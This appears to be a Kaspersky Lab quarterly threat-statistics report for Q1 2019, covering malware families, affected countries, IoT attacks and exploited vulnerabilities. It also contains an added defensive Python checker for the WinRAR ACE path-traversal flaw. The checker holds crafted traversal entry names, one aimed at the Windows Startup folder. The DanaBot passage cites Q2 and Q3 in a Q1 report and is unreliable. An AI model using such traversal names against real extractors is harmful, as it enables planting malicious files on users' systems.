Distribution of detected mobile apps by type

Distribution of newly detected mobile apps by type, Q4 2018 and Q1 2019

Among all the threats detected in Q1 2019, the lion’s share went to potentially unsolicited RiskTool apps with 29.80%, a fall of 19 p.p. against the previous quarter. The most frequently encountered objects came from the RiskTool.AndroidOS.Dnotua (28% of all detected threats of this class), RiskTool.AndroidOS.Agent (27%), and RiskTool.AndroidOS.SMSreg (16%) families.

In second place were threats in the Trojan-Dropper class (24.93%), whose share increased by 13 p.p. The vast majority of files detected belonged to the Trojan-Dropper.AndroidOS.Wapnor families (93% of all detected threats of this class). Next came the Trojan-Dropper.AndroidOS.Agent (3%) and Trojan-Dropper.AndroidOS.Hqwar (2%) families, and others.

The share of advertising apps (adware) doubled compared to Q4 2018. The AdWare.AndroidOS.Agent (44.44% of all threats of this class), AdWare.AndroidOS.Ewind (35.93%), and AdWare.AndroidOS.Dnotua (4.73%) families were the biggest contributors.

The statistics show a significant rise in the number of mobile financial threats in Q1 2019. If in Q4 2018 the share of mobile banking Trojans was 1.85%, in Q1 2019 the figure stood at 3.24% of all detected threats.

The most frequently created objects belonged to the Trojan-Banker.AndroidOS.Svpeng (20% of all detected mobile bankers), Trojan-Banker.AndroidOS.Asacub (18%), and Trojan-Banker.AndroidOS.Agent (15%) families.

Top 20 mobile malware programs

Note that this malware rating does not include potentially dangerous or unwanted programs such as RiskTool and Adware.

   #  Verdict                                %*
   1  DangerousObject.Multi.Generic          54.26
   2  Trojan.AndroidOS.Boogr.gsh             12.72
   3  Trojan-Banker.AndroidOS.Asacub.snt      4.98
   4  DangerousObject.AndroidOS.GenericML     4.35
   5  Trojan-Banker.AndroidOS.Asacub.a        3.49
   6  Trojan-Dropper.AndroidOS.Hqwar.bb       3.36
   7  Trojan-Dropper.AndroidOS.Lezok.p        2.60
   8  Trojan-Banker.AndroidOS.Agent.ep        2.53
   9  Trojan.AndroidOS.Dvmap.a                1.84
  10  Trojan-Banker.AndroidOS.Svpeng.q        1.83
  11  Trojan-Banker.AndroidOS.Asacub.cp       1.78
  12  Trojan.AndroidOS.Agent.eb               1.74
  13  Trojan.AndroidOS.Agent.rt               1.72
  14  Trojan-Banker.AndroidOS.Asacub.ce       1.70
  15  Trojan-SMS.AndroidOS.Prizmes.a          1.66
  16  Exploit.AndroidOS.Lotoor.be             1.59
  17  Trojan-Dropper.AndroidOS.Hqwar.gen      1.57
  18  Trojan-Dropper.AndroidOS.Tiny.d         1.51
  19  Trojan-Banker.AndroidOS.Svpeng.ak       1.49
  20  Trojan.AndroidOS.Triada.dl              1.47

* Unique users attacked by the relevant malware as a percentage of all users of Kaspersky Lab’s mobile security solutions that were attacked.

As is customary, first place in the Top 20 for Q1 went to the DangerousObject.Multi.Generic verdict (54.26%), which we use for malware detected using cloud technologies. Cloud technologies are deployed when the antivirus databases lack data for detecting a piece of malware, but the company’s cloud already contains information about the object. This is basically how the latest malicious programs are detected.

In second place came Trojan.AndroidOS.Boogr.gsh (12.72%). This verdict is assigned to files recognized as malicious by our system based on machine learning.

Third place went to the Trojan-Banker.AndroidOS.Asacub.snt banker (4.98%). In Q1, this family was well represented in our Top 20: four positions out of 20 (3rd, 5th, 11th, 14th).

The DangerousObject.AndroidOS.GenericML verdict (4.35%), which ranked fourth in Q1, is perhaps the most interesting. It is given to files detected by machine learning. But unlike the Trojan.AndroidOS.Boogr.gsh verdict, which is assigned to malware that is processed and detected inside Kaspersky Lab’s infrastructure, the DangerousObject.AndroidOS.GenericML verdict is given to files on the side of users of the company’s security solutions before such files go for processing. The latest threat patterns are now detected this way.

Sixth and seventeenth places were taken by members of the Hqwar dropper family: Trojan-Dropper.AndroidOS.Hqwar.bb (3.36%) and Trojan-Dropper.AndroidOS.Hqwar.gen (1.57%), respectively. These packers most often contain banking Trojans, including Asacub.

Seventh position belonged to Trojan-Dropper.AndroidOS.Lezok.p (2.60%). The Lezok family is notable for its variety of distribution schemes, among them a supply chain attack, whereby the malware is sewn into the firmware of the mobile device before delivery to the store. This is very dangerous for two reasons:

  • It is extremely difficult for an ordinary user to determine whether their device is already infected.
  • Getting rid of such malware is highly complex.

The Lezok Trojan family is designed primarily to display persistent ads, sign users up for paid SMS subscriptions, and inflate counters for apps on various platforms.

The last Trojan worthy of a mention on the topic of the Top 20 mobile threats is Trojan-Banker.AndroidOS.Agent.ep. It is encountered both in standalone form and inside Hqwar droppers. The malware has extensive capabilities for countering dynamic analysis, and can detect being launched in the Android Emulator or Genymotion environment. It can open arbitrary web pages to phish for login credentials. It uses Accessibility Services to obtain various rights and interact with other apps.

Geography of mobile threats

Map of mobile malware infection attempts, Q1 2019

Top 10 countries by share of users attacked by mobile malware:

   #  Country*      %**
   1  Pakistan      37.54
   2  Iran          31.55
   3  Bangladesh    28.38
   4  Algeria       24.03
   5  Nigeria       22.59
   6  India         21.53
   7  Tanzania      20.71
   8  Indonesia     17.16
   9  Kenya         16.27
  10  Mexico        12.01

* Excluded from the rating are countries with relatively few users of Kaspersky Lab’s mobile antivirus (under 10,000).
** Unique users attacked in the country as a percentage of all users of Kaspersky Lab’s mobile antivirus in the country.

Pakistan (37.54%) ranked first, with the largest number of users in this country being attacked by AdWare.AndroidOS.Agent.f, AdWare.AndroidOS.Ewind.h, and AdWare.AndroidOS.HiddenAd.et adware.

Second place was taken by Iran (31.55%), which appears consistently in the Top 10 every quarter. The most commonly encountered malware in this country was Trojan.AndroidOS.Hiddapp.bn, as well as the potentially unwanted apps RiskTool.AndroidOS.Dnotua.yfe and RiskTool.AndroidOS.FakGram.a. Of these three, the latter is the most noteworthy – the main task of this app is to intercept Telegram messages. It should be mentioned that Telegram is banned in Iran, so any of its clones are in demand, as confirmed by the infection statistics.

Third place went to Bangladesh (28.38%), where in Q1 the same advertising apps were weaponized as in Pakistan.

Mobile banking Trojans

In the reporting period, we detected 29,841 installation packages for mobile banking Trojans, almost 11,000 more than in Q4 2018.

The greatest contributions came from the creators of the Trojan-Banker.AndroidOS.Svpeng (20% of all detected banking Trojans), the second-place Trojan-Banker.AndroidOS.Asacub (18%), and the third-place Trojan-Banker.AndroidOS.Agent (15%) families.

Number of installation packages for mobile banking Trojans, Q2 2018 – Q1 2019

   #  Verdict                                %*
   1  Trojan-Banker.AndroidOS.Asacub.snt     23.32
   2  Trojan-Banker.AndroidOS.Asacub.a       16.35
   3  Trojan-Banker.AndroidOS.Agent.ep       11.82
   4  Trojan-Banker.AndroidOS.Svpeng.q        8.57
   5  Trojan-Banker.AndroidOS.Asacub.cp       8.33
   6  Trojan-Banker.AndroidOS.Asacub.ce       7.96
   7  Trojan-Banker.AndroidOS.Svpeng.ak       7.00
   8  Trojan-Banker.AndroidOS.Agent.eq        4.96
   9  Trojan-Banker.AndroidOS.Asacub.ar       2.47
  10  Trojan-Banker.AndroidOS.Hqwar.t         2.10

* Unique users attacked by the relevant malware as a percentage of all users of Kaspersky Lab’s mobile security solutions that were attacked by banking threats.

This time, fully half the Top 10 banking threats are members of the Trojan-Banker.AndroidOS.Asacub family: five positions out of ten. The creators of this Trojan actively distributed samples throughout Q1. In particular, the number of users attacked by the Asacub.cp Trojan reached 8,200 per day. But even this high result was surpassed by Asacub.snt with 13,000 users per day at the peak of the campaign.

It was a similar story with Trojan-Banker.AndroidOS.Agent.ep: We recorded around 3,000 attacked users per day at its peak. However, by the end of the quarter, the average daily number of attacked unique users had dropped below 1,000. Most likely, this was due not to decreased demand for the Trojan, but to cybercriminals’ transition to a two-stage system of infection using Hqwar droppers.

Geography of mobile banking threats, Q1 2019

Top 10 countries by share of users attacked by mobile banking Trojans:

#    Country*        %**
1    Australia       0.81
2    Turkey          0.73
3    Russia          0.64
4    South Africa    0.35
5    Ukraine         0.31
6    Tajikistan      0.25
7    Armenia         0.23
8    Kyrgyzstan      0.17
9    US              0.16
10   Moldova         0.16

* Excluded from the rating are countries with relatively few users of Kaspersky Lab’s mobile antivirus (under 10,000).
** Unique users attacked by mobile banking Trojans as a percentage of all users of Kaspersky Lab’s mobile security solutions in this country.

In Q1 2019, Australia (0.81%) took first place in our Top 10. The most common infection attempts we registered in this country were by Trojan-Banker.AndroidOS.Agent.eq and Trojan-Banker.AndroidOS.Agent.ep. Neither is exclusive to Australia; both are used in attacks worldwide.

Second place was taken by Turkey (0.73%), where, as in Australia, Trojan-Banker.AndroidOS.Agent.ep was most often detected.

Russia is in third place (0.64%), where we most frequently detected malware from the Asacub and Svpeng families.

Mobile ransomware

In Q1 2019, we detected 27,928 installation packages of mobile ransomware, which is 3,900 more than in the previous quarter.

Number of mobile ransomware installation packages detected by Kaspersky Lab (Q2 2018 – Q1 2019)

#    Verdict                               %*
1    Trojan-Ransom.AndroidOS.Svpeng.ah    28.91
2    Trojan-Ransom.AndroidOS.Rkor.h       19.42
3    Trojan-Ransom.AndroidOS.Svpeng.aj     9.46
4    Trojan-Ransom.AndroidOS.Small.as      8.81
5    Trojan-Ransom.AndroidOS.Rkor.snt      5.36
6    Trojan-Ransom.AndroidOS.Svpeng.ai     5.21
7    Trojan-Ransom.AndroidOS.Small.o       3.24
8    Trojan-Ransom.AndroidOS.Fusob.h       2.74
9    Trojan-Ransom.AndroidOS.Small.ce      2.49
10   Trojan-Ransom.AndroidOS.Svpeng.snt    2.33

* Unique users attacked by the relevant malware as a percentage of all users of Kaspersky Lab’s mobile security solutions that were attacked by ransomware.

In Q1 2019, the most common mobile ransomware family was Svpeng with four positions in the Top 10.

Geography of mobile ransomware, Q1 2019

Top 10 countries by share of users attacked by mobile ransomware:

#    Country*        %**
1    US              1.54
2    Kazakhstan      0.36
3    Iran            0.28
4    Pakistan        0.14
5    Mexico          0.10
6    Saudi Arabia    0.10
7    Canada          0.07
8    Italy           0.07
9    Indonesia       0.05
10   Belgium         0.05

* Excluded from the rating are countries with relatively few users of Kaspersky Lab’s mobile antivirus (under 10,000).
** Unique users attacked by mobile ransomware as a percentage of all users of Kaspersky Lab’s mobile security solutions in this country.

The Top 3 countries by share of users attacked by mobile ransomware were, as in the previous quarter, the US (1.54%), Kazakhstan (0.36%), and Iran (0.28%).

Attacks on Apple macOS

On the topic of threats to various platforms, such a popular system as macOS cannot be ignored. Although new malware families for this platform are relatively rare, threats do exist for it, largely in the shape of adware.

The modus operandi of such apps is widely known: infect the victim, take root in the system, and show advertising banners. That said, for each ad displayed and banner clicked the attackers receive a very modest fee, so they need:

  1. The code that displays the advertising banner to run as often as possible on the infected machine,
  2. The victim to click on the banners as often as possible,
  3. As many victims as possible.

It should be noted that the adware infection technique and adware behavior on the infected machine at times differ little from malware. Meanwhile, the banners themselves can be shown in an arbitrary place on the screen at any time, be it in an open browser window, in a separate window in the center of the screen, etc.

Top 20 threats for macOS

#    Verdict                             %*
1    Trojan-Downloader.OSX.Shlayer.a    24.62
2    AdWare.OSX.Spc.a                   20.07
3    AdWare.OSX.Pirrit.j                10.31
4    AdWare.OSX.Pirrit.p                 8.44
5    AdWare.OSX.Agent.b                  8.03
6    AdWare.OSX.Pirrit.o                 7.45
7    AdWare.OSX.Pirrit.s                 6.88
8    AdWare.OSX.Agent.c                  6.03
9    AdWare.OSX.MacSearch.a              5.95
10   AdWare.OSX.Cimpli.d                 5.72
11   AdWare.OSX.Mcp.a                    5.71
12   AdWare.OSX.Pirrit.q                 5.55
13   AdWare.OSX.MacSearch.d              4.48
14   AdWare.OSX.Agent.a                  4.39
15   Downloader.OSX.InstallCore.ab       3.88
16   AdWare.OSX.Geonei.ap                3.75
17   AdWare.OSX.MacSearch.b              3.48
18   AdWare.OSX.Geonei.l                 3.42
19   AdWare.OSX.Bnodlero.q               3.33
20   RiskTool.OSX.Spigot.a               3.12

* Unique users attacked by this malware as a percentage of all users of Kaspersky Lab’s security solutions for macOS that were attacked.

Trojan-Downloader.OSX.Shlayer.a (24.62%) finished first in our ranking of macOS threats. Malware from the Shlayer family is distributed under the guise of Flash Player or its updates. Their main task is to download and install various advertising apps, including Bnodlero.

AdWare.OSX.Spc.a (20.07%) and AdWare.OSX.Mcp.a (5.71%) are typical adware apps that are distributed together with various “cleaner” programs for macOS. After installation, they write themselves to the autoloader and run in the background.

Members of the AdWare.OSX.Pirrit family add extensions to the victim’s browser; some versions also install a proxy server on the victim’s machine to intercept traffic from the browser. All this serves one purpose – to inject advertising into web pages viewed by the user.

The malware group consisting of AdWare.OSX.Agent.a, AdWare.OSX.Agent.b, and AdWare.OSX.Agent.c is closely related to the Pirrit family, since it often downloads members of the latter. It can basically download, unpack, and launch different files, as well as embed JS code with ads into web pages seen by the victim.

AdWare.OSX.MacSearch is another family of advertising apps with extensive tools for interacting with the victim’s browser. It can manipulate the browser history (read/write), change the browser search system to its own, add extensions, and embed advertising banners on pages viewed by the user. Plus, it can download and install other apps without the user’s knowledge.

AdWare.OSX.Cimpli.d (5.72%) is able to download and install other advertising apps, but its main purpose is to change the browser home page and install advertising extensions. As with other adware apps, all these actions have the aim of displaying ads in the victim’s browser.

The creators of the not-a-virus:Downloader.OSX.InstallCore family, having long perfected their tricks on Windows, transferred the same techniques to macOS. The typical InstallCore member is in fact an installer (more precisely, a framework for creating an installer with extensive capabilities) of other programs that do not form part of the main InstallCore package and are downloaded separately. Besides legitimate software, it can distribute less salubrious apps, including ones containing aggressive advertising. Among other things, InstallCore is used to distribute DivX Player.

The AdWare.OSX.Geonei family is one of the oldest adware families for macOS. It employs custom obfuscation techniques to counteract security solutions. As is typical for adware programs, its main task is to display ads in the browser by embedding them in the HTML code of the web page.

Like other similar apps, AdWare.OSX.Bnodlero.q (3.33%) installs advertising extensions in the user’s browser, and changes the default search engine and home page. What’s more, it can download and install other advertising apps.

Threat geography

#    Country*    %**
1    France      11.54
2    Spain        9.75
3    India        8.83
4    Italy        8.20
5    US           8.03
6    Canada       7.94
7    UK           7.52
8    Russia       7.51
9    Brazil       7.45
10   Mexico       6.99

* Excluded from the rating are countries with relatively few users of Kaspersky Lab’s security solutions for macOS (under 10,000).
** Unique attacked users as a percentage of all users of Kaspersky Lab’s security solutions for macOS in the country.

In Q1 2019, France (11.54%) took first place in the Top 10. The most common infection attempts we registered in this country came from Trojan-Downloader.OSX.Shlayer.a, AdWare.OSX.Spc.a and AdWare.OSX.Bnodlero.q.

Users from Spain (9.75%), India (8.83%), and Italy (8.20%), who ranked second, third, and fourth, respectively, most often encountered Trojan-Downloader.OSX.Shlayer.a, AdWare.OSX.Spc.a, AdWare.OSX.Bnodlero.q, AdWare.OSX.Pirrit.j, and AdWare.OSX.Agent.b.

Fifth place in the ranking went to the US (8.03%), which saw the same macOS threats as Europe. Note that US residents also had to deal with advertising apps from the Cimpli family.

IoT attacks

Interesting events

In Q1 2019, we noticed several curious features in the behavior of IoT malware. First, some Mirai samples were equipped with a tool for artificial environment detection: if the malware detected it was running in a sandbox, it stopped working. The implementation was primitive (scanning for the presence of procfs), but we expect it to become more complex in the near future.

Second, one of the versions of Mirai was spotted to contain a mechanism for clearing the environment of other bots. It works using templates, killing the process if its name matches that of the template. Interestingly, Mirai itself ended up in the list of such names (the malware itself does not contain “mirai” in the process name):

  • dvrhelper
  • dvrsupport
  • mirai
  • blade
  • demon
  • hoho
  • hakai
  • satori
  • messiah
  • mips

Lastly, a few words about a miner that uses an old exploit for Oracle WebLogic Server. Strictly speaking, it is not IoT malware but a Trojan for Linux.

Taking advantage of the fact that Weblogic Server is cross-platform and can be run on a Windows host or under Linux, the cybercriminals embedded checks for different operating systems, and are now attacking Windows hosts along with Linux.

Section of code responsible for attacking Windows and Linux hosts

IoT threat statistics

Q1 demonstrated that there are still many devices in the world that attack each other through telnet. Note, however, that this has little to do with the qualities of the protocol itself: devices and servers managed through SSH are closely monitored by administrators and hosting companies, and any malicious activity on them is quickly terminated. This is one reason why there are significantly fewer unique addresses attacking via SSH than IP addresses from which telnet attacks come.

Telnet    83%
SSH       17%

Distribution of attacked services by number of unique IP addresses of devices that carried out attacks, Q1 2019

Nevertheless, cybercriminals are actively using powerful servers to manage their vast botnets. This is seen by the number of sessions in which cybercriminal servers interact with Kaspersky Lab’s traps.

SSH       64%
Telnet    36%

Distribution of cybercriminal working sessions with Kaspersky Lab's traps by service, Q1 2019

If attackers have SSH access to an infected device, they have far greater scope to monetize the infection. In the overwhelming majority of cases involving intercepted sessions, we registered spam mailings, attempts to use our trap as a proxy server, and (least often of all) cryptocurrency mining.

Telnet-based attacks

Geography of IP addresses of devices from which attempts were made to attack Kaspersky Lab’s telnet traps, Q1 2019

Top 10 countries where devices were located that carried out telnet-based attacks on Kaspersky Lab’s traps.

#    Country    %*
1    Egypt      13.46
2    China      13.19
3    Brazil     11.09
4    Russia      7.17
5    Greece      4.45
6    Jordan      4.14
7    US          4.12
8    Iran        3.24
9    India       3.14
10   Turkey      2.49

* Infected devices in the country as a percentage of the total number of all infected IoT devices attacking via telnet.

In Q1 2019, Egypt (13.46%) topped the leaderboard by number of unique IP addresses from which attempts were made to attack Kaspersky Lab’s traps. Second place by a small margin goes to China (13.19%), with Brazil (11.09%) in third.

Cybercriminals most often used telnet attacks to infect devices with one of the many Mirai family members.

Top 10 malware downloaded to infected IoT devices following a successful telnet attack

#    Verdict                            %*
1    Backdoor.Linux.Mirai.b            71.39
2    Backdoor.Linux.Mirai.ba           20.15
3    Backdoor.Linux.Mirai.au            4.85
4    Backdoor.Linux.Mirai.c             1.35
5    Backdoor.Linux.Mirai.h             1.23
6    Backdoor.Linux.Mirai.bj            0.72
7    Trojan-Downloader.Shell.Agent.p    0.06
8    Backdoor.Linux.Hajime.b            0.06
9    Backdoor.Linux.Mirai.s             0.06
10   Backdoor.Linux.Gafgyt.bj           0.04

* Share of malware in the total amount of malware downloaded to IoT devices following a successful telnet attack

It is worth noting that bots based on Mirai code make up most of the Top 10. There is nothing surprising about this, and the situation could persist for a long time given Mirai’s universality.

SSH-based attacks

Geography of IP addresses of devices from which attempts were made to attack Kaspersky Lab’s SSH traps, Q1 2019

Top 10 countries in which devices were located that carried out SSH-based attacks on Kaspersky Lab’s traps.

#    Country    %*
1    China      23.24
2    US          9.60
3    Russia      6.07
4    Brazil      5.31
5    Germany     4.20
6    Vietnam     4.11
7    France      3.88
8    India       3.55
9    Egypt       2.53
10   Korea       2.10

* Infected devices in the country as a percentage of the total number of infected IoT devices attacking via SSH

Most often, a successful SSH-based attack resulted in the following types of malware being downloaded to the victim's device: Backdoor.Perl.Shellbot.cd, Backdoor.Perl.Tsunami.gen, and Trojan-Downloader.Shell.Agent.p.

Financial threats

Quarterly highlights

The banker Trojan DanaBot, detected in Q2, continued to grow actively. The new modification not only updated the communication protocol with the C&C center, but expanded the list of organizations targeted by the malware. Whereas last quarter the main targets were located in Australia and Poland, in Q3 organizations in Austria, Germany, and Italy were added.

Recall that DanaBot has a modular structure and can load additional plugins to intercept traffic, steal passwords, and hijack crypto wallets. The malware was distributed through spam mailings with a malicious office document, which was used to download the main body of the Trojan.

Financial threat statistics

In Q1 2019, Kaspersky Lab solutions blocked attempts to launch one or more types of malware designed to steal money from bank accounts on the computers of 243,604 users.

Number of unique users attacked by financial malware, Q1 2019

Attack geography

To evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country we calculated the share of users of Kaspersky Lab products that faced this threat during the reporting period out of all users of our products in that country.

Top 10 countries by share of attacked users

#    Country*       %**
1    South Korea    2.2
2    China          2.1
3    Belarus        1.6
4    Venezuela      1.6
5    Serbia         1.6
6    Greece         1.5
7    Egypt          1.4
8    Pakistan       1.3
9    Cameroon       1.3
10   Zimbabwe       1.3

* Excluded are countries with relatively few Kaspersky Lab product users (under 10,000).
** Unique users whose computers were targeted by banking Trojans as a percentage of all unique users of Kaspersky Lab products in the country.

Top 10 banking malware families

#    Name          Verdict                                 %*
1    RTM           Trojan-Banker.Win32.RTM                27.4
2    Zbot          Trojan.Win32.Zbot                      22.9
3    Emotet        Backdoor.Win32.Emotet                   9.4
4    Trickster     Trojan.Win32.Trickster                  6.6
5    Nymaim        Trojan.Win32.Nymaim                     5.9
6    Nimnul        Virus.Win32.Nimnul                      4.6
7    SpyEye        Backdoor.Win32.SpyEye                   4.3
8    Neurevt       Trojan.Win32.Neurevt                    3.6
9    NeutrinoPOS   Trojan-Banker.Win32.NeutrinoPOS         2.6
10   Tinba         Trojan-Banker.Win32.Tinba               1.4

* Unique users attacked by this malware as a percentage of all users attacked by financial malware.

In Q1 2019, the familiar Trojan-Banker.Win32.RTM (27.4%), Trojan.Win32.Zbot (22.9%), and Backdoor.Win32.Emotet (9.4%) made up the Top 3. In fourth place was Trojan.Win32.Trickster (6.6%), and fifth was Trojan.Win32.Nymaim (5.9%).

Ransomware programs

Quarterly highlights

The most high-profile event of the quarter was probably the LockerGoga ransomware attack on several major companies. The ransomware code itself constitutes nothing new, but the large-scale infections attracted the attention of the media and the public. Such incidents yet again spotlight the issue of corporate and enterprise network security, because in the event of penetration, instead of using ransomware (which would immediately make itself felt), cybercriminals can install spyware and steal confidential data for years on end without being noticed.

A vulnerability was discovered in the popular WinRAR archiver that allows an arbitrary file to be placed in an arbitrary directory when unpacking an ACE archive. The cybercriminals did not miss the chance to assemble an archive that unpacks the executable file of the JNEC ransomware into the system autorun directory.

February saw attacks on network-attached storages (NAS), in which Trojan-Ransom.Linux.Cryptor malware was installed on the victim device, encrypting data on all attached drives using elliptic-curve cryptography. Such attacks are especially dangerous because NAS devices are often used to store backup copies of data. What’s more, the victim tends to be unaware that a separate device running Linux might be targeted by intruders.

Nomoreransom.org partners, in cooperation with cyber police, created a utility for decrypting files impacted by GandCrab (Trojan-Ransom.Win32.GandCrypt) up to and including version 5.1. It helps victims of the ransomware to restore access to their data without paying a ransom. Unfortunately, as is often the case, shortly after the public announcement, the cybercriminals updated the malware to version 5.2, which cannot be decrypted by this tool.

Statistics

Number of new modifications

The number of new modifications fell markedly against Q4 2018 to the level of Q3. Seven new families were identified in the collection.

Number of new ransomware modifications, Q1 2018 – Q1 2019

Number of users attacked by ransomware Trojans

In Q1 2019, Kaspersky Lab products defeated ransomware attacks against 284,489 unique KSN users.

In February, the number of attacked users decreased slightly compared with January; however, by March we recorded a rise in cybercriminal activity.

Number of unique users attacked by ransomware Trojans, Q1 2019

Attack geography

Geography of ransomware Trojans, Q1 2019

Top 10 countries attacked by ransomware Trojans

#    Country*      % of users attacked by cryptors**
1    Bangladesh    8.11
2    Uzbekistan    6.36
3    Ethiopia      2.61
4    Mozambique    2.28
5    Nepal         2.09
6    Vietnam       1.37
7    Pakistan      1.14
8    Afghanistan   1.13
9    India         1.11
10   Indonesia     1.07

* Excluded are countries with relatively few Kaspersky Lab users (under 50,000).
** Unique users whose computers were attacked by Trojan cryptors as a percentage of all unique users of Kaspersky Lab products in the country.

Top 10 most common families of ransomware Trojans

#    Name                  Verdicts*                          Percentage of attacked users**
1    WannaCry              Trojan-Ransom.Win32.Wanna          26.25
2    (generic verdict)     Trojan-Ransom.Win32.Phny           18.98
3    GandCrab              Trojan-Ransom.Win32.GandCrypt      12.33
4    (generic verdict)     Trojan-Ransom.Win32.Crypmod         5.76
5    Shade                 Trojan-Ransom.Win32.Shade           3.54
6    (generic verdict)     Trojan-Ransom.Win32.Encoder         3.50
7    PolyRansom/VirLock    Virus.Win32.PolyRansom              2.82
8    (generic verdict)     Trojan-Ransom.Win32.Gen             2.02
9    Crysis/Dharma         Trojan-Ransom.Win32.Crusis          1.51
10   (generic verdict)     Trojan-Ransom.Win32.Cryptor         1.20

* Statistics are based on detection verdicts of Kaspersky Lab products. The information was provided by Kaspersky Lab product users who consented to provide statistical data.
** Unique Kaspersky Lab users attacked by a particular family of Trojan cryptors as a percentage of all users attacked by Trojan cryptors.

Miners

Statistics

Number of new modifications

In Q1 2019, Kaspersky Lab solutions detected 11,971 new modifications of miners.

Number of new miner modifications, Q1 2019

Number of users attacked by miners

In Q1, we detected attacks using miners on the computers of 1,197,066 unique users of Kaspersky Lab products worldwide.

Number of unique users attacked by miners, Q1 2019

Attack geography

Top 10 countries by share of users attacked by miners

#    Country*      %**
1    Afghanistan   12.18
2    Ethiopia      10.02
3    Uzbekistan     7.97
4    Kazakhstan     5.84
5    Tanzania       4.73
6    Ukraine        4.28
7    Mozambique     4.17
8    Belarus        3.84
9    Bolivia        3.35
10   Pakistan       3.33

* Excluded are countries with relatively few Kaspersky Lab users (under 50,000).
** Unique users whose computers were attacked by miners as a percentage of all unique users of Kaspersky Lab products in the country.

Vulnerable applications used by cybercriminals

Statistics for Q1 2019 show that vulnerabilities in Microsoft Office are still utilized more often than those in other applications, because they are easy to exploit and the resulting exploits are highly reliable. The share of exploits for Microsoft Office did not change much compared to the previous quarter, amounting to 69%.

Distribution of exploits used by cybercriminals, by type of attacked application, Q1 2019

This quarter’s most popular vulnerabilities in the Microsoft Office suite were CVE-2017-11882 and CVE-2018-0802. They relate to the Equation Editor component, and cause buffer overflow with subsequent remote code execution. Lagging behind the chart leaders by a factor of almost two is CVE-2017-8570, a logical vulnerability and an analog of the no less popular CVE-2017-0199. Next comes CVE-2017-8759, where an error in the SOAP WSDL parser caused malicious code to be injected and the computer to be infected. Microsoft Office vulnerabilities are overrepresented in the statistics partly due to the emergence of openly available generators of malicious documents that exploit these vulnerabilities.

In Q1, the share of detected exploits for browser vulnerabilities amounted to 14%, almost five times less than for Microsoft Office. Exploiting browser vulnerabilities is often harder, since browser developers keep adding mitigations against whole classes of vulnerabilities, and bypassing them usually requires chaining several vulnerabilities to achieve the objective, which significantly increases the cost of such attacks.

However, this does not mean that in-depth attacks on browsers do not exist. A prime example is the actively exploited zero-day vulnerability CVE-2019-5786 in Google Chrome (https://securityaffairs.co/wordpress/82058/hacking/chrome-zero-day-cve-2019-5786.html). To escape the sandbox, it was chained with an exploit for a vulnerability in the win32k.sys driver (CVE-2019-0808), with the targets being users of 32-bit versions of Windows 7.

It is fair to say that Q1 2019, like the quarter before it, was marked by a large number of targeted attacks using zero-days. Kaspersky Lab researchers found an actively exploited zero-day vulnerability in the Windows kernel, which was assigned the ID CVE-2019-0797. The exploit relied on a race condition caused by a lack of thread synchronization in undocumented system calls, resulting in a use-after-free. It is worth noting that CVE-2019-0797 is the fourth Windows zero-day found by Kaspersky Lab in recent months.

A remarkable event at the beginning of the year was the discovery by researchers of the CVE-2018-20250 vulnerability, which had existed for 19 years in the module for unpacking ACE archives in the WinRAR utility. This component lacks sufficient checks of the file path stored in an archive entry, so a specially crafted ACE archive lets cybercriminals write an executable file into the system autorun (Startup) directory. The vulnerability was immediately used to start distributing malicious archives.
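The missing check, written out as an added example (this is illustrative code, not WinRAR's unpacker and not Kaspersky's): before an entry is written, its stored name must reduce to a relative path with no drive letter, no root and no ".." component, and the final destination must still lie under the extraction directory. The extraction directory and the entry names below are constructed for the demonstration; the traversal entry mimics the Startup-folder trick described above without reproducing any real sample.

```python
"""Added example: validating archive entry names before extraction.

Illustrative code for this page, not WinRAR's or any vendor's implementation.
It demonstrates the check that CVE-2018-20250 shows was missing in the ACE
unpacker: an entry name from the archive must never be allowed to steer the
output file outside the directory chosen by the user.
"""
from pathlib import PureWindowsPath
from typing import Dict, Iterable


class UnsafeEntryPath(ValueError):
    """Raised for an archive entry whose name would escape the extraction directory."""


def resolve_entry(extract_dir: str, entry_name: str) -> PureWindowsPath:
    """Return the absolute destination for entry_name, or raise UnsafeEntryPath.

    Rejected: anchored names (drive letter such as C:, UNC prefix, or a
    leading backslash), any '..' component, and empty names. PureWindowsPath
    treats both '\\' and '/' as separators, as Windows does.
    """
    base = PureWindowsPath(extract_dir)
    if not base.is_absolute():
        raise ValueError("extract_dir must be an absolute path")
    entry = PureWindowsPath(entry_name)
    if entry.anchor:  # drive, UNC share or root: the archive must not choose these
        raise UnsafeEntryPath(f"anchored path rejected: {entry_name!r}")
    parts = [p for p in entry.parts if p not in ("", ".")]
    if not parts:
        raise UnsafeEntryPath(f"empty entry name: {entry_name!r}")
    if any(p == ".." for p in parts):
        raise UnsafeEntryPath(f"parent traversal rejected: {entry_name!r}")
    dest = base.joinpath(*parts)
    # Belt and braces: the joined path must still start with the base directory.
    if dest.parts[: len(base.parts)] != base.parts:
        raise UnsafeEntryPath(f"escapes extraction dir: {entry_name!r}")
    return dest


def triage_entries(extract_dir: str, names: Iterable[str]) -> Dict[str, str]:
    """Map each entry name to its destination path, or to a 'REJECTED: ...' reason."""
    outcome: Dict[str, str] = {}
    for name in names:
        try:
            outcome[name] = str(resolve_entry(extract_dir, name))
        except UnsafeEntryPath as exc:
            outcome[name] = f"REJECTED: {exc}"
    return outcome


# Constructed sample entry names (not taken from any real archive).
SAMPLE_ENTRIES = [
    "readme.txt",
    "docs\\manual.pdf",
    "..\\..\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\x.exe",
    "nested/../../evil.exe",
    "C:\\Users\\Public\\x.exe",
    "\\Windows\\Temp\\x.exe",
]

if __name__ == "__main__":
    # Assumed extraction directory for the demonstration.
    for name, result in triage_entries("C:\\Users\\victim\\Downloads\\unpacked", SAMPLE_ENTRIES).items():
        print(f"{name!r} -> {result}")
```

The same rule applies to any archive format: reject on the stored name first, then re-check the joined result, because a single normalization step is exactly what such unpackers tend to get wrong.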

Despite the fact that two years have passed since the SMB vulnerabilities targeted by the FuzzBunch exploit kit (EternalBlue, EternalRomance, etc.) were patched in MS17-010, these attacks still occupy all the top positions in our statistics. This is driven by the continuing growth of malware that uses these exploits as a vector to spread inside corporate networks.

Attacks via web resources

The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Malicious websites are specially created by cybercriminals; web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected.

Countries that are sources of web-based attacks:

